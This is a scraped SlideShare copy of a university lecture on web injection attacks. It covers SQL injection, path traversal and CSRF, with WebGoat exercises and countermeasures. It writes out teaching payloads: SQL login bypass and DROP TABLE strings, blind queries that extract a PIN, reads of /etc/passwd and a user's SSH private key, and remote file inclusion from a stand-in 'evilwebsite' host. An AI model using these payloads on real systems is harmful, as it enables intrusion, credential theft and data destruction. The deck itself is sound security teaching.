4MMSR - Information Systems Security             3 - web vulnerabilities and attacks                       Fabien Duchene1...
Outline1   Injection       Introduction       Web Application: definition2   Some web injections vulnerabilities      SQL I...
InjectionOutline1   Injection       Introduction       Web Application: definition2   Some web injections vulnerabilities  ...
Injection   IntroductionInjection IIntuitive Definitionexploitation of a vulnerability that permits injecting data and/or c...
Injection   IntroductionInjection IIThreat level [OWASP 2011] Exploitability        +++    EASY Prevalence            ++  ...
Injection   IntroductionSome Injection vulnerabilitiesAn attacker’s goal: run code he controls on the subsystem vulnerabil...
Injection   IntroductionSome Injection vulnerabilitiesAn attacker’s goal: run code he controls on the subsystem vulnerabil...
Injection   Web Application: definitionIntuitive definition I   Fabien Duchene (LIG)   4MMSR-3-Web vulnerabilities and attac...
Injection   Web Application: definitionIntuitive definition IIInputs    HTTP request headers: names and values:   Fabien Duc...
Injection   Web Application: definitionIntuitive definition IIIOutputs    HTTP Response HEADERS    HTTP Response BODY    .. ...
Injection   Web Application: definitionWeb Application:Formal definition I[Fabien Duchene 2012]    Let Σ be an alphabet.    ...
Injection   Web Application: definitionWeb Application:Formal definition II   A web application is modeled as an Input Outpu...
Some web injections vulnerabilitiesOutline1   Injection       Introduction       Web Application: definition2   Some web in...
Some web injections vulnerabilities   SQL InjectionSQL Injection Attack (SQli) Icode injection at the database layer of an...
Some web injections vulnerabilities   SQL InjectionSQL injection: schemaSQLi: a method    0. have a goal: what do you aim ...
Some web injections vulnerabilities   SQL Injection SQli: basic - “Incorrect type handling” I  Incorrect type handling    ...
Some web injections vulnerabilities   SQL InjectionSQli: basic - “Incorrect type handling” II    Basic form. We submit it ...
Some web injections vulnerabilities   SQL InjectionSQli: basic - “Incorrect type handling” III    Have a look at the sourc...
Some web injections vulnerabilities   SQL InjectionSQli: basic - “Incorrect type handling” IV    It works, the station par...
Some web injections vulnerabilities   SQL InjectionSQli: basic - “Incorrect type handling” V    exploitation succeeds: we ...
Some web injections vulnerabilities   SQL Injection SQli: basic - “Incorrect type handling” VI         Also works if we us...
Some web injections vulnerabilities   SQL Injection SQLi: basic - “Incorrectly filtered escape characters” I  Incorrect typ...
Some web injections vulnerabilities   SQL Injection SQLi: basic - “Incorrectly filtered escape characters” I  Incorrect typ...
Some web injections vulnerabilities   SQL Injection SQLi: basic - “Incorrectly filtered escape characters” II1 s t a t e m ...
Some web injections vulnerabilities   SQL Injection SQLi: basic - “Incorrectly filtered escape characters” II1 s t a t e m ...
Some web injections vulnerabilities     SQL InjectionA Formal Definition of an SQL injection I[Wassermann 2008]Syntactic co...
Some web injections vulnerabilities   SQL InjectionA Formal Definition of an SQL injection IISufficient condition for an SQL ...
Some web injections vulnerabilities   SQL InjectionA Formal Definition of an SQL injection IIIFor input parameter 2, no pro...
Some web injections vulnerabilities   SQL Injection“Blind” SQLi IBlind SQL injection?     production environment do not le...
Some web injections vulnerabilities   SQL Injection “Blind” SQLi II1 SELECT ‘ f i e l d n a m e ‘ from ‘ t a b l e n a m e...
Some web injections vulnerabilities   SQL Injection“Blind” SQLi III    Is the application sensible to blind injection?    ...
Some web injections vulnerabilities   SQL Injection“Blind” SQLi IV   Now let us explore the possible space via dichotomy  ...
Some web injections vulnerabilities   SQL Injection“Blind” SQLi V   Thus the value is between 211 = 2048 and 212 = 4096 (s...
Some web injections vulnerabilities   SQL Injection “Blind” SQLi VI1 101 AND (SELECT p i n FROM p i n s WHERE c c n u m b ...
Some web injections vulnerabilities   SQL Injection“Blind” SQLi VII5Blind string SQL Injection Attack     Similar: charact...
Some web injections vulnerabilities   SQL Injection SQLi blind string injection: exercise       we want to find the first ch...
Some web injections vulnerabilities   SQL Injection SQLi blind string injection: exercise       we want to find the first ch...
Some web injections vulnerabilities   SQL Injection SQLi Prevention I          input sanitization                 only all...
Some web injections vulnerabilities   SQL Injection SQLi Prevention II  PHP:1 $ p s = $db−>p r e p a r e (          ’ SELE...
Some web injections vulnerabilities   Path TraversalPath TraversalPath Traversal aka “../” (dot-dot-slash) vulnerability  ...
Some web injections vulnerabilities   Path TraversalPath Traversal: schema I   Fabien Duchene (LIG)           4MMSR-3-Web ...
Some web injections vulnerabilities   Path TraversalPath Traversal: schema IIA method   1. Observe the inputs dependencies...
Some web injections vulnerabilities   Path Traversal     Example I   <?php 2    $color = ’ blue ’ ;      i f ( i s s e t (...
Some web injections vulnerabilities   Path TraversalPath vulnerability exampleHow would you perform an HTTP GET request in...
Some web injections vulnerabilities   Path TraversalPath vulnerability exampleHow would you perform an HTTP GET request in...
Some web injections vulnerabilities   Path Traversal    Example II    Consider a similar PHP code, replace the include lin...
Some web injections vulnerabilities   Path Traversal  Example II  Consider a similar PHP code, replace the include line:1 ...
Some web injections vulnerabilities   Path TraversalPath traversal - countermeasures    (once more) input sanitization    ...
Some web injections vulnerabilities   CSRFCSRF ICross Site Request Forgery: main objective    attacker tricks a victim to ...
Some web injections vulnerabilities   CSRFCSRF II   Fabien Duchene (LIG)           4MMSR-3-Web vulnerabilities and attacks...
Some web injections vulnerabilities   CSRFCSRF IIICSRF: detailed steps   1. application logic discovery: the attacker craf...
Some web injections vulnerabilities   CSRF  CSRF example I  Aimelyne wants to trick Ilyas to receive 2000 USD from him via...
Some web injections vulnerabilities   CSRFCSRF example IIMalicious link constructionHow would A construct a malicious link...
Some web injections vulnerabilities   CSRFCSRF example IIMalicious link constructionHow would A construct a malicious link...
Some web injections vulnerabilities   CSRFCSRF example IIITransmission to the victimHow would A send that link to the vict...
Some web injections vulnerabilities   CSRFCSRF example IIITransmission to the victimHow would A send that link to the vict...
Some web injections vulnerabilities   CSRFCSRF countermeasures   client side:           Let the user to decide to perform ...
Some web injections vulnerabilities   XSS - Cross-Site scriptingX whaaat? IXSS (aka Cross Site Scripting) is a code inject...
Some web injections vulnerabilities   XSS - Cross-Site scriptingX whaaat? IIHow attackers do have fun?   silently install ...
Some web injections vulnerabilities   XSS - Cross-Site scriptingX whaaat? IIICauses    HTML mix content, control statement...
Some web injections vulnerabilities   XSS - Cross-Site scriptingWhere can it be found? I   any website processing argument...
Some web injections vulnerabilities   XSS - Cross-Site scriptingWhere can it be found? II   m.facebook.com [CrazyDaVinci 2...
Some web injections vulnerabilities   XSS - Cross-Site scriptingXSS classificationAccording to the minimal number of execut...
Some web injections vulnerabilities   XSS - Cross-Site scriptingReflected XSS / type 1 attack9    9        [IBM 2002] Cross...
Some web injections vulnerabilities   XSS - Cross-Site scriptingReflected XSS / type 1 attackReflected XSS    aka non-persis...
Some web injections vulnerabilities   XSS - Cross-Site scriptingReflected XSS / type 1 attackReflected XSS    aka non-persis...
Some web injections vulnerabilities   XSS - Cross-Site scriptingReflected XSS - example I   web application: online shop   ...
Some web injections vulnerabilities   XSS - Cross-Site scriptingReflected XSS - example II   after submitting the form   Fa...
Some web injections vulnerabilities   XSS - Cross-Site scriptingReflected XSS - example III   observe the HTTP Request para...
Some web injections vulnerabilities   XSS - Cross-Site scripting Reflected XSS - example III I        attempt to inject in ...
Some web injections vulnerabilities   XSS - Cross-Site scripting Reflected XSS - example III II1 QTY1=1a<img s r c=m a r i ...
Some web injections vulnerabilities   XSS - Cross-Site scripting Type 1 - XSS a formal definition I [Fabien Duchene 2012] L...
Some web injections vulnerabilities   XSS - Cross-Site scriptingType 1 - XSS a formal definition IIExtract of the Parse Tre...
Some web injections vulnerabilities   XSS - Cross-Site scriptingStored XSS / type 2 attack I10     10          [IBM 2002] ...
Some web injections vulnerabilities   XSS - Cross-Site scriptingStored XSS   interesting for browser worms   impact more i...
Some web injections vulnerabilities   XSS - Cross-Site scriptingStored XSS - example I   [WebGoat - the vulnerable web app...
Some web injections vulnerabilities   XSS - Cross-Site scriptingStored XSS - example II   Login form   Fabien Duchene (LIG...
Some web injections vulnerabilities   XSS - Cross-Site scriptingStored XSS - example III   Profile visualization   Fabien D...
Some web injections vulnerabilities   XSS - Cross-Site scriptingStored XSS example   Profile edition   Any idea?   Fabien D...
Some web injections vulnerabilities   XSS - Cross-Site scriptingStored XSS example   Profile edition   Any idea?   Fabien D...
Some web injections vulnerabilities   XSS - Cross-Site scriptingStored XSS example I   Now let us logon as Jerry   Fabien ...
Some web injections vulnerabilities   XSS - Cross-Site scriptingStored XSS example II   And check Tom’s profile:   Fabien D...
Some web injections vulnerabilities   XSS - Cross-Site scriptingStored XSS example III   P0wN3d!   Fabien Duchene (LIG)   ...
Some web injections vulnerabilities   XSS - Cross-Site scriptingDOM based XSS / type 0 attack IThe web-server does not rec...
Some web injections vulnerabilities   XSS - Cross-Site scriptingDOM based XSS / type 0 attack IIDOM XSS steps   1. searchi...
Some web injections vulnerabilities   XSS - Cross-Site scriptingDOM based XSS / type 0 attack IIICauses                   ...
Some web injections vulnerabilities   XSS - Cross-Site scriptingDocument Object ModelDOM? a tree permitting accessing in a...
Some web injections vulnerabilities   XSS - Cross-Site scripting   DOM XSS example I   Classic example from the original D...
Some web injections vulnerabilities   XSS - Cross-Site scripting  DOM XSS example II         normal usage:         http://...
Some web injections vulnerabilities   XSS - Cross-Site scriptingXSS counter-measures IInput sanitization    client size: l...
Some web injections vulnerabilities   XSS - Cross-Site scriptingXSS counter-measures II    both: httpOnly [httponly] (on m...
Appendix    For Further Reading0x6D6172696F, Mario Heiderich (2011).Locking the Throne Room - ECMA Script 5, a frozen DOM ...
Appendix    For Further ReadingIBM, Paul Lee (2002). Cross-site scripting. https://www.ibm.com/developerworks/tivoli/libra...
Appendix    For Further ReadingOWASP. WebGoat - the vulnerable web application. https://www.owasp.org/index.php/Category:O...
Appendix    For Further ReadingSymantec (2009).Symantec Global Internet Security Threat Report - trends for 2008.http://ev...
Bonus slides   XSSAlso see     Some tricks to escape browser protections [XSS]    [HTML5 security]    Fabien Duchene (LIG)...
Upcoming SlideShare
Loading in …5
×

4MMSR-3 web vulnerabilities-lecturer

1,196 views
1,129 views

Published on

4MMSR-3 web vulnerabilities-lecturer

Published in: Technology
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
1,196
On SlideShare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
0
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

4MMSR-3 web vulnerabilities-lecturer

  1. 1. 4MMSR - Information Systems Security 3 - web vulnerabilities and attacks Fabien Duchene1 @fabien duchene [Lecturer version] 1 Laboratoire d’Informatique de Grenoble, VASCO team Grenoble Institute of Technology - Grenoble INP Ensimag firstname.name@imag.fr 2011-2012Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 1/86 2011-2012 1 / 86
  2. 2. Outline1 Injection Introduction Web Application: definition2 Some web injections vulnerabilities SQL Injection Path Traversal CSRF XSS - Cross-Site scripting Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 2/86 2011-2012 2 / 86
  3. 3. InjectionOutline1 Injection Introduction Web Application: definition2 Some web injections vulnerabilities SQL Injection Path Traversal CSRF XSS - Cross-Site scripting Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 3/86 2011-2012 3 / 86
  4. 4. Injection IntroductionInjection IIntuitive Definitionexploitation of a vulnerability that permits injecting data and/or codeon the target. [Kunz 2011] Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 4/86 2011-2012 4 / 86
  5. 5. Injection IntroductionInjection IIThreat level [OWASP 2011] Exploitability +++ EASY Prevalence ++ COMMON Detectability ++ AVERAGE Impact +++ SEVERE Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 5/86 2011-2012 5 / 86
  6. 6. Injection IntroductionSome Injection vulnerabilitiesAn attacker’s goal: run code he controls on the subsystem vulnerability targeted sub- what is in- impact system jected Buffer OverFlow, Format String SQL Injection XSS Path Traversal(Some) causes non sufficiently sanitized inputs insecure use of input parameters Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 6/86 2011-2012 6 / 86
  7. 7. Injection IntroductionSome Injection vulnerabilitiesAn attacker’s goal: run code he controls on the subsystem vulnerability targeted sub- what is in- impact system jected Buffer OverFlow, in memory exe- assembly data code execution Format String cutable and instructions =⇒ integrity, SQL Injection database SQL data and confidentiality, commands availability of XSS web application HTML / JS / data (client browser) Java/... code Path Traversal reading, writ- file name integrity, con- ing, deleting fidentiality, files availability of files(Some) causes non sufficiently sanitized inputs Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 6/86 2011-2012 6 / 86
  8. 8. Injection Web Application: definitionIntuitive definition I Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 7/86 2011-2012 7 / 86
  9. 9. Injection Web Application: definitionIntuitive definition IIInputs HTTP request headers: names and values: Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 8/86 2011-2012 8 / 86
  10. 10. Injection Web Application: definitionIntuitive definition IIIOutputs HTTP Response HEADERS HTTP Response BODY .. Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 9/86 2011-2012 9 / 86
  11. 11. Injection Web Application: definitionWeb Application:Formal definition I[Fabien Duchene 2012] Let Σ be an alphabet. A transition u of a web application is a mapping from n user inputs ilu ∈ Σ∗ : Iu = i1 , ..., in to an output q = q1 · q2 · ... · qk , q ∈ Σ∗ . Each u u qj is either a webserver filtered input parameter ilu - i.e. ∃fr ∈ Filters , qj = fr (ilu ) - or a string qh surrounding one or two qj . : : q is (in many cases) generated by GO , the output grammar (eg: HTML) An input sequence is I = (I1 , ..., Im ) where each Iu adheres to the above definition. Filters is a finite set of functions from Σ∗ → Σ∗ such as PHP addslashes(). Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 10/86 2011-2012 10 / 86
  12. 12. Injection Web Application: definitionWeb Application:Formal definition II A web application is modeled as an Input Output Labelled Transition System, in which each transition u conforms to the above definition. Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 11/86 2011-2012 11 / 86
  13. 13. Some web injections vulnerabilitiesOutline1 Injection Introduction Web Application: definition2 Some web injections vulnerabilities SQL Injection Path Traversal CSRF XSS - Cross-Site scripting Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 12/86 2011-2012 12 / 86
  14. 14. Some web injections vulnerabilities SQL InjectionSQL Injection Attack (SQli) Icode injection at the database layer of an application subsystem: SQL database goal: read or alter (modify or delete) data impact: Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 13/86 2011-2012 13 / 86
  15. 15. Some web injections vulnerabilities SQL InjectionSQL injection: schemaSQLi: a method 0. have a goal: what do you aim to do? eg: steal and delete all customer data? LOOP: 1.1 gain knowledge: “how easy” can we inject? do we have a helpful error message? 1.2 try the most interesting ones of the applicable exploitation methods (wrt the current database knowledge) Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 14/86 2011-2012 14 / 86
  16. 16. Some web injections vulnerabilities SQL Injection SQli: basic - “Incorrect type handling” I Incorrect type handling data is not strongly typed in the example: an integer is expected, but the language interpreter evaluates the whole expression1 s t a t e m e n t := ”SELECT ∗ FROM w e a t h e r d a t a WHERE s t a t i o n= ” + a variable + ”;” 1 Example: webgoat SQLi Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 15/86 2011-2012 15 / 86
  17. 17. Some web injections vulnerabilities SQL InjectionSQli: basic - “Incorrect type handling” II Basic form. We submit it once and observe: Once we submit, the station parameter seems to be used in the data retrieval. Goal: to extract all the data from that database table Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 16/86 2011-2012 16 / 86
  18. 18. Some web injections vulnerabilities SQL InjectionSQli: basic - “Incorrect type handling” III Have a look at the source code, and observe the parameter name Since it is simpler to perform request by HTTP GET, give it a try: Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 17/86 2011-2012 17 / 86
  19. 19. Some web injections vulnerabilities SQL InjectionSQli: basic - “Incorrect type handling” IV It works, the station parameter sent via a GET request is used by the web application: Let us try to inject: write a query so that it will always be evaluated to TRUE Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 18/86 2011-2012 18 / 86
  20. 20. Some web injections vulnerabilities SQL InjectionSQli: basic - “Incorrect type handling” V exploitation succeeds: we are able to extract all the records from that table Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 19/86 2011-2012 19 / 86
  21. 21. Some web injections vulnerabilities SQL Injection SQli: basic - “Incorrect type handling” VI Also works if we use HTTP POST, here with Firefox Hackbar 2 Note: we only tried to get the data, but think about31 s t a t i o n =103 OR 1=1 ; DROP t a b l e w e a t h e r d a t a 1 [Webgoat - numeric SQL injection] Webgoat - numeric SQL injection 2 [Firefox hackbar add-on] Firefox hackbar add-on 3 Most SQL server implementations allow multiple statements. API do generally not: PHP:mysql query() and Python:sqlite3.[.].execute() do not support this. Some functions such as Python:sqllite3.[.].executescript() however do Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 20/86 2011-2012 20 / 86
  22. 22. Some web injections vulnerabilities SQL Injection SQLi: basic - “Incorrectly filtered escape characters” I Incorrect type handling user input is not filtered for escape characters (eg: ’ ” ..) parameters are passed without using prepared statement1 s t a t e m e n t = ”SELECT ∗ FROM u s e r s WHERE name = ’ ” + userName + ” ’; ” How would you set the variable userName to bypass the authentication? A possible answer: Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 21/86 2011-2012 21 / 86
  23. 23. Some web injections vulnerabilities SQL Injection SQLi: basic - “Incorrectly filtered escape characters” I Incorrect type handling user input is not filtered for escape characters (eg: ’ ” ..) parameters are passed without using prepared statement1 s t a t e m e n t = ”SELECT ∗ FROM u s e r s WHERE name = ’ ” + userName + ” ’; ” How would you set the variable userName to bypass the authentication? A possible answer: ’ or ’trueblood’=’trueblood Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 21/86 2011-2012 21 / 86
  24. 24. Some web injections vulnerabilities SQL Injection SQLi: basic - “Incorrectly filtered escape characters” II1 s t a t e m e n t = ”SELECT ∗ FROM u s e r s WHERE name = ’ ” + userName + ” ’ ; UPDATE TABLE l o g o n a t t e m p t s SET a t t e m p t s=a t t e m p t s+1 WHERE name=’ ”+userName+” ’ ; ” How do we prevent the logon attempt counter to increase for that username? A possible answer: Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 22/86 2011-2012 22 / 86
  25. 25. Some web injections vulnerabilities SQL Injection SQLi: basic - “Incorrectly filtered escape characters” II1 s t a t e m e n t = ”SELECT ∗ FROM u s e r s WHERE name = ’ ” + userName + ” ’ ; UPDATE TABLE l o g o n a t t e m p t s SET a t t e m p t s=a t t e m p t s+1 WHERE name=’ ”+userName+” ’ ; ” How do we prevent the logon attempt counter to increase for that username? A possible answer: Escape the second query thanks to SQL comments: mario ; −− Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 22/86 2011-2012 22 / 86
  26. 26. Some web injections vulnerabilities SQL InjectionA Formal Definition of an SQL injection I[Wassermann 2008]Syntactic confinementGiven a Context-Free Grammar G = (V , Σ, S, R) nonterminals V ,terminals Σ, a start symbol S, and production rules R. Let =⇒ G denote“derives in one step”, st. if α, β ∈ (Σ ∪ V ) and A → γ ∈ R thenαAβ =⇒ G αγβ. Let =⇒ ∗G the reflexive transitive closure of =⇒ GAlso given a string σ = σ1 σ2 σ3 ∈ Σ∗ ,σ2 is syntactically confined in σ iff: there exists a sentential form σ1 X σ3 s.t. X ∈ (V ∪ Σ) and S =⇒ ∗G σ1 X σ3 =⇒ ∗G σ1 σ2 σ3 . Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 23/86 2011-2012 23 / 86
  27. 27. Some web injections vulnerabilities SQL InjectionA Formal Definition of an SQL injection IISufficient condition for an SQL injectionGO , the output grammar is the SQL Grammar one. For a given e,Ie = (i1 , i2 , ...in ), let the corresponding output be q = q1 + q2 + .. + qk . e e eIf ∃ a qj in q s.t. qj is not syntactically confined in q then Ie is a SQL : :injection attack. Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 24/86 2011-2012 24 / 86
  28. 28. Some web injections vulnerabilities SQL InjectionA Formal Definition of an SQL injection IIIFor input parameter 2, no production rule could generate only the taintedoutput 2:::::::::: : OR 1 = 1. Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 25/86 2011-2012 25 / 86
  29. 29. Some web injections vulnerabilities SQL Injection“Blind” SQLi IBlind SQL injection? production environment do not let you see the error outputs when trying to inject in such a system: “blind injection” more injection techniques on [Hackipedia - SQL injection] 4Example: webgoat blind integer SQLIA Assume a simple SELECT WHERE request such as: Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 26/86 2011-2012 26 / 86
  30. 30. Some web injections vulnerabilities SQL Injection “Blind” SQLi II1 SELECT ‘ f i e l d n a m e ‘ from ‘ t a b l e n a m e ‘ WHERE ‘ f i e l d 1 ‘= ’ a r g 1 ’ If we try a random number: If we try to input a non integer: generic error message (no “straightforward” information disclosure) Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 27/86 2011-2012 27 / 86
  31. 31. Some web injections vulnerabilities SQL Injection“Blind” SQLi III Is the application sensible to blind injection? Yes! Does such a record exist? 101 AND (SELECT COUNT(*) FROM pins WHERE cc number=1111222233334444)>=1 Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 28/86 2011-2012 28 / 86
  32. 32. Some web injections vulnerabilities SQL Injection“Blind” SQLi IV Now let us explore the possible space via dichotomy 101 AND (SELECT pin FROM pins WHERE cc number=1111222233334444)<POWER(2,31) ... POWER(2,30) ... POWER(2,11): the first one (descending order) for which the condition is evaluated to false Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 29/86 2011-2012 29 / 86
  33. 33. Some web injections vulnerabilities SQL Injection“Blind” SQLi V Thus the value is between 211 = 2048 and 212 = 4096 (stricly) Now let us continue the dichotomy: Still too high... Now too low ... We iterate that process, and finally: Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 30/86 2011-2012 30 / 86
  34. 34. Some web injections vulnerabilities SQL Injection “Blind” SQLi VI1 101 AND (SELECT p i n FROM p i n s WHERE c c n u m b e r =1111222233334444) <(POWER( 2 , 1 1 )+POWER( 2 , 8 )+POWER( 2 , 5 )+ POWER( 2 , 4 )+POWER( 2 , 3 )+POWER( 2 , 2 )+POWER( 2 , 0 ) ) 211 + 28 + 25 + 24 + 23 + 22 + 20 = 2365 Let us verify one last time that the value is 2364 Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 31/86 2011-2012 31 / 86
  35. 35. Some web injections vulnerabilities SQL Injection“Blind” SQLi VII5Blind string SQL Injection Attack Similar: character per character discovery by using the CHAR(x) (x: integer ; ex in ASCII encoding: CHAR(41)=’A’ ; CHAR(61)=’a’) ASCII(c) (c: character ; eg: ASCII(’a’)=61) and SUBSTRING(str,start,length) SQL functions Encoding-dependent: ASCII, UTF8, UTF16 ... Heuristic: would promote characters of the assumed alphabet 4 [Webgoat - numeric SQL injection] Webgoat - numeric SQL injection 5 [Mavituna - SQL injection sheet 2007] Mavituna - SQL injection sheet Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 32/86 2011-2012 32 / 86
  36. 36. Some web injections vulnerabilities SQL Injection SQLi blind string injection: exercise we want to find the first character of the field user name of the table users of the record with user id equal to 6969 ... thanks to the following SQL request: (and we are able to manipulate $bet id) we know that bet id = 3679 is a valid ID1 ’ SELECT MAX( ‘ bet amount ‘ ) FROM ‘ b e t s ‘ WHERE ‘ b e t i d ‘= ’ + $bet id + ’ ; ’ A possible answer: Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 33/86 2011-2012 33 / 86
  37. 37. Some web injections vulnerabilities SQL Injection SQLi blind string injection: exercise we want to find the first character of the field user name of the table users of the record with user id equal to 6969 ... thanks to the following SQL request: (and we are able to manipulate $bet id) we know that bet id = 3679 is a valid ID1 ’ SELECT MAX( ‘ bet amount ‘ ) FROM ‘ b e t s ‘ WHERE ‘ b e t i d ‘= ’ + $bet id + ’ ; ’ A possible answer: Initialization: 3679’ AND (ASCII(SELECT SUBSTRING(user name,0,1) WHERE user id=6969) > ((ASCII(’z’)-ASCII(’A’))/2) ; – Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 33/86 2011-2012 33 / 86
  38. 38. Some web injections vulnerabilities SQL Injection SQLi Prevention I input sanitization only allow some characters .. or explicitly deny some that have a meaning 6 strongly type the parameters Use parameterized statements Java1 j a v a . s q l . PreparedStatement prep = connection . prepareStatement ( ”SELECT ∗ FROM u s e r s WHERE LASTNAME = ? AND AGE = ? ” ) ;3 prep . s e t S t r i n g (1 , lastname ) ; p r e p . s e t I n t ( 2 , age ) ;5 prep . executeQuery () ; 6 problem: might be encoding dependent (eg: UTF-8, UTF-16) Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 34/86 2011-2012 34 / 86
  39. 39. Some web injections vulnerabilities SQL Injection SQLi Prevention II PHP:1 $ p s = $db−>p r e p a r e ( ’ SELECT p a s t a , f l a v o r , q u a n t i t y , o r d e r d a y ’ .3 ’FROM o r d e r s WHERE u s e r i d =? AND o r d e r m o n t h =? ’ ) ; $ps−>e x e c u t e ( a r r a y ( $ c u r r e n t u s e r i d , $month ) ) ; Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 35/86 2011-2012 35 / 86
  40. 40. Some web injections vulnerabilities Path TraversalPath TraversalPath Traversal aka “../” (dot-dot-slash) vulnerability performing operations (read, execute, write) on files, folders that the web application developper(s) did not conceive the application for impact: security properties: “LFI” Local File Inclusion “RFI” Remote File Inclusion Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 36/86 2011-2012 36 / 86
  41. 41. Some web injections vulnerabilities Path TraversalPath Traversal: schema I Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 37/86 2011-2012 37 / 86
  42. 42. Some web injections vulnerabilities Path TraversalPath Traversal: schema IIA method 1. Observe the inputs dependencies regarding on which file an action is performed (and eventually which action) 2. craft those inputs to perform the desired action(s) on the desired file(s) Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 38/86 2011-2012 38 / 86
  43. 43. Some web injections vulnerabilities Path Traversal Example I <?php 2 $color = ’ blue ’ ; i f ( i s s e t ( $ GET [ ’LANGUAGE ’ ] ) ) 4 $ l a n g u a g e = $ GET [ ’LANGUAGE ’ ] ; i n c l u d e ( $ l a n g u a g e . ’ . php ’ ) ; 6 ?> 8 <form method=” g e t ”> < s e l e c t name=”LANGUAGE”>10 <o p t i o n v a l u e=” e n g l i s h ”>e n g l i s h </o p t i o n > <o p t i o n v a l u e=” c h i n e s e ”>c h i n e s e </o p t i o n >12 </ s e l e c t > <i n p u t t y p e=” s u b m i t ”>14 </form> 1–files/file–include.php Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 39/86 2011-2012 39 / 86
  44. 44. Some web injections vulnerabilities Path TraversalPath vulnerability exampleHow would you perform an HTTP GET request in order to list the content of the /etc/passwd file? LFI. A possible answer: run code from a remote file? RFI. A possible answer: Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 40/86 2011-2012 40 / 86
  45. 45. Some web injections vulnerabilities Path TraversalPath vulnerability exampleHow would you perform an HTTP GET request in order to list the content of the /etc/passwd file? LFI. A possible answer: ?LANGUAGE=/etc/passwd%00 run code from a remote file? RFI. A possible answer: ?LANGUAGE=’http://evilwebsite.ext/evilscript.ext%00 Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 40/86 2011-2012 40 / 86
  46. 46. Some web injections vulnerabilities Path Traversal Example II Consider a similar PHP code, replace the include line: ...2 i n c l u d e ( ” /home/ webapp1 / p u b l i c h t m l / c o d e / l a n g u a g e s / ” . $language ) ; ... How would you read the RSA SSH private key ( /.ssh/id rsa) of the user orlando (/home/orlando) ? Directory traversal. A possible answer: Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 41/86 2011-2012 41 / 86
  47. 47. Some web injections vulnerabilities Path Traversal Example II Consider a similar PHP code, replace the include line:1 ... i n c l u d e ( ” /home/ webapp1 / p u b l i c h t m l / c o d e / l a n g u a g e s / ” . $language ) ;3 ... How would you read the RSA SSH private key ( /.ssh/id rsa) of the user orlando (/home/orlando) ? Directory traversal. A possible answer: ../../../../orlando/.ssh/id rsa Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 41/86 2011-2012 41 / 86
  48. 48. Some web injections vulnerabilities Path TraversalPath traversal - countermeasures (once more) input sanitization limit file inclusion to a selected subset of directories. This can be done at several layers: interpreter (eg: PHP (allow url fopen allow url include), ASP.Net) web-server (eg: Apache httpd) configuration) chroot jails or similar systems (children processes will only be able to open files within the defined chroot jail authorization) enforce strict ACL on sensitive files and run websites on different identity than the owner(s) of those sensitive files Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 42/86 2011-2012 42 / 86
  49. 49. Some web injections vulnerabilities CSRFCSRF ICross Site Request Forgery: main objective attacker tricks a victim to load.. a webpage on a legitimate website by loading that webpage, the victim will perform the action planned by the attackerCauses web application is not able to distinguish between an automatic action and a user-driven one Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 43/86 2011-2012 43 / 86
  50. 50. Some web injections vulnerabilities CSRFCSRF II Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 44/86 2011-2012 44 / 86
